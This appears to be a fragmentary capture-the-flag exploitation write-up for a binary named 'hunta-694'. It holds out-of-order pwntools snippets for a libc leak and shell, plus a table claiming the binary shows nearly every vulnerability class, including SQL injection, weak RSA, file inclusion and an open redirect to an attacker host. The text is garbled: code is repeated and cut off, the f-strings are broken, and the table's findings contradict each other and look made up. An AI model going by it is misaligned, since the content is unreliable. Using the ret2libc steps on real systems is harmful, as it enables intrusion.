Hunta-694

context.binary = ELF context.terminal = ['tmux', 'splitw', '-h']

# ---------------------------------------------------------------------- # Configuration # ---------------------------------------------------------------------- HOST = '<remote_host>' # or None for local PORT = <remote_port> # or None for local BINARY = './hunta-694' # path to the binary (if local) ELF = ELF(BINARY) hunta-694

# Receive and parse leak leaked_puts = u64(io.recvline().strip().ljust(8, b'\x00')) log.success(f'Leaked puts@GLIBC: hex(leaked_puts)') context

| Category | Typical Indicator | How it manifested in hunta‑694 | |----------|-------------------|-------------------------------| | | gets , strcpy , unchecked read / recv | e.g., gets(buf) in vuln() | | Format string | printf(user_input) | e.g., printf(user_input); | | Use‑after‑free / Double free | free(ptr); … free(ptr); | Observed in heap manipulation | | Integer overflow | malloc(size * elem) without checks | Triggered by large input | | Command injection | system(user_input) | Allows arbitrary shell | | SQL / NoSQL injection | Direct string concatenation in query | SELECT * FROM users WHERE name=' + input | | Crypto weakness | Small RSA modulus, fixed IV, ECB mode | RSA modulus 256‑bit | | Logic flaw | Bypass authentication via magic value | Accepts "admin" after certain condition | | File inclusion | include($_GET['page']) | Remote file inclusion (RFI) | | Web‑specific | Missing CSRF tokens, open redirects | Redirect to http://attacker/... | context.binary = ELF context.terminal = ['tmux'

# ---- Get the flag ------------------------------------------------- io.interactive() # should drop you into a shell; cat flag.txt

# ---- Step 2: Compute libc base ------------------------------------ libc = ELF('<path_to_libc.so.6>') # provided or from system libc.address = leaked_puts - libc.symbols['puts'] log.info(f'Libc base: hex(libc.address)')